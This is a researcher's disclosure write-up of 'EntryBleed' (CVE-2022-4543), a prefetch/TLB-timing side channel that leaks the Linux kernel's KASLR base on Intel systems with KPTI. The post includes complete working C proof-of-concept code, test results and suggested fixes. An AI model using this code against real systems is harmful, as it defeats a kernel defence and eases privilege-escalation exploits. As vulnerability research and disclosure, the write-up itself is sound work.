EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)
A flaw named “EntryBleed” was found in the Linux kernel’s Page Table Isolation (KPTI) implementation. It could allow a local attacker on Intel systems to leak the KASLR base via a prefetch side channel based on TLB timing.
I recently discovered that Linux KPTI has implementation issues that allow any unprivileged local attacker to bypass KASLR on Intel-based systems. While technically only an info-leak, it still provides a primitive with serious implications for bugs previously considered too hard to exploit, and it was assigned CVE-2022-4543. For reasons that will become clear later in this writeup, I have decided to name this attack “EntryBleed.”
KPTI stands for Kernel Page Table Isolation. Its original name, KAISER, stood for “Kernel Address Isolation to have Side-channels Efficiently Removed,” and it actually predates Meltdown, as other side-channel KASLR bypasses were already known to be an issue. It was introduced into Linux a few years ago as a patch for the Meltdown micro-architectural vulnerability, which let unprivileged attackers read kernel memory through a side channel. According to the documentation, KPTI splits the user and kernel page tables for each process. The kernel page tables still have all of userspace virtual memory mapped in, but with the NX bit set; the user page tables, on the other hand, map only the minimal amount of kernel virtual memory, such as the exception/syscall entry handlers and anything else necessary for the user-to-kernel transition. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses through CPU side-channel attacks, then as of this post it has clearly failed.
In 2016, Daniel Gruss discovered the concept of the prefetch side channel. I used one variant of it, which specifically uses the TLB (the caching mechanism for virtual-to-physical address translations) as the side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch finishes quickly if the translation for the address being loaded is already present in the TLB, but more slowly when it is not (and a page table walk needs to be done). At the time, it was already known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high-resolution timing instructions like “RDTSC.”
Before I continue with the attack, I must note that my main inspiration came from Google Project Zero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI is now left off on more modern CPUs because those have Meltdown mitigations in silicon, but that this makes them vulnerable to prefetch attacks again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which makes perfect sense given the purpose of KPTI/KAISER and seemed to be the consensus among a few security researcher friends I talked to.
For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which, based on /proc/kallsyms, is at a constant offset from the KASLR base) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for 64-bit syscalls. Notice how the handler executes a few instructions before switching to the kernel CR3 (if KPTI is on) - this means that this function still has to be mapped in the userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same KASLR-rebased address in the user page tables as in the kernel page tables - this sounds very suspicious!
At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64 and, since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page containing entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then to run the prefetch side-channel over the possible range of addresses for that handler (the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000).
An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page’s page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: “global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables.” I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I’m misunderstanding the code, so it would be great if someone can correct me if I’m wrong here.
Anyway, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load on normal systems, and I can deduce the KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped for a fence instruction so that it works in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted for each kernel by setting it to the distance between entry_SYSCALL_64 and startup_64):
    #define _GNU_SOURCE
    #include <inttypes.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define KERNEL_LOWER_BOUND 0xffffffff80000000ull
    #define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
    #define entry_SYSCALL_64_offset 0x400000ull

    /* Time two prefetches of addr, in TSC cycles. */
    uint64_t sidechannel(uint64_t addr) {
        uint64_t a, b, c, d;
        asm volatile (".intel_syntax noprefix;"
            "mfence;"
            "rdtscp;"
            "mov %0, rax;"
            "mov %1, rdx;"
            "xor rax, rax;"
            "lfence;"
            "prefetchnta qword ptr [%4];"
            "prefetcht2 qword ptr [%4];"
            "xor rax, rax;"
            "lfence;"
            "rdtscp;"
            "mov %2, rax;"
            "mov %3, rdx;"
            "mfence;"
            ".att_syntax;"
            /* early-clobber outputs so none of them shares a register with addr */
            : "=&r" (a), "=&r" (b), "=&r" (c), "=&r" (d)
            : "r" (addr)
            : "rax", "rbx", "rcx", "rdx");
        a = (b << 32) | a;
        c = (d << 32) | c;
        return c - a;
    }

    #define STEP 0x100000ull
    /* parenthesized so that ARR_SIZE expands to the intended value */
    #define SCAN_START (KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset)
    #define SCAN_END (KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset)
    #define DUMMY_ITERATIONS 5
    #define ITERATIONS 100
    #define ARR_SIZE ((SCAN_END - SCAN_START) / STEP)

    uint64_t leak_syscall_entry(void) {
        uint64_t data[ARR_SIZE] = {0};
        uint64_t min = ~0ull, addr = ~0ull;

        for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) {
            for (uint64_t idx = 0; idx < ARR_SIZE; idx++) {
                uint64_t test = SCAN_START + idx * STEP;
                syscall(104); /* getgid on x86_64: pulls the entry page into the TLB */
                uint64_t time = sidechannel(test);
                if (i >= DUMMY_ITERATIONS) /* discard the warm-up rounds */
                    data[idx] += time;
            }
        }

        /* the candidate with the lowest average time is the mapped handler */
        for (uint64_t i = 0; i < ARR_SIZE; i++) {
            data[i] /= ITERATIONS;
            if (data[i] < min) {
                min = data[i];
                addr = SCAN_START + i * STEP;
            }
            printf("%" PRIx64 " %" PRIu64 "\n", (uint64_t)(SCAN_START + i * STEP), data[i]);
        }
        return addr;
    }

    int main(void) {
        printf("KASLR base %" PRIx64 "\n", leak_syscall_entry() - entry_SYSCALL_64_offset);
        return 0;
    }
KASLR bypassed on systems with KPTI in less than 100 lines of C!
I’ve managed to get this working on multiple Intel CPUs (including i5-8265U, i7-8750H, i7-9700F, i7-9750H, Xeon® CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (though one needs to forward the host CPU features with "-cpu host" in QEMU for prefetch to work at all). I’m not sure how the TLB side-effects are preserved across CR3 writes and potential VM exits in a VM scenario - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don’t have direct access to any AMD hardware (see the edit at the end). Lastly, I don’t believe the repeated syscalls are necessary in my exploit: later tests showed that it worked without making one before each measurement, most likely due to the global bit. I still kept them in my exploit just to guarantee that the entry is present in the TLB.
Here is a demonstration of it (kernel base is printed before the shell for comparison purposes):
One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.
In conclusion, Linux KPTI doesn’t do its job, and it’s still quite easy to get the KASLR base. I’ve already emailed [email protected] as well as the relevant distro mailing lists, and was authorized to disclose this since a potential fix might take a while. I’m honestly not too sure what the best fix is, as it’s more of an implementation issue, but I suggested three options for the entry/exit handlers that are mapped into userspace: randomize their virtual address, place them at a fixed virtual address unrelated to the kernel base, or give them a randomized offset from the kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.
I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!
Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn’t surprising given this paper and this security advisory. However, it’s also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.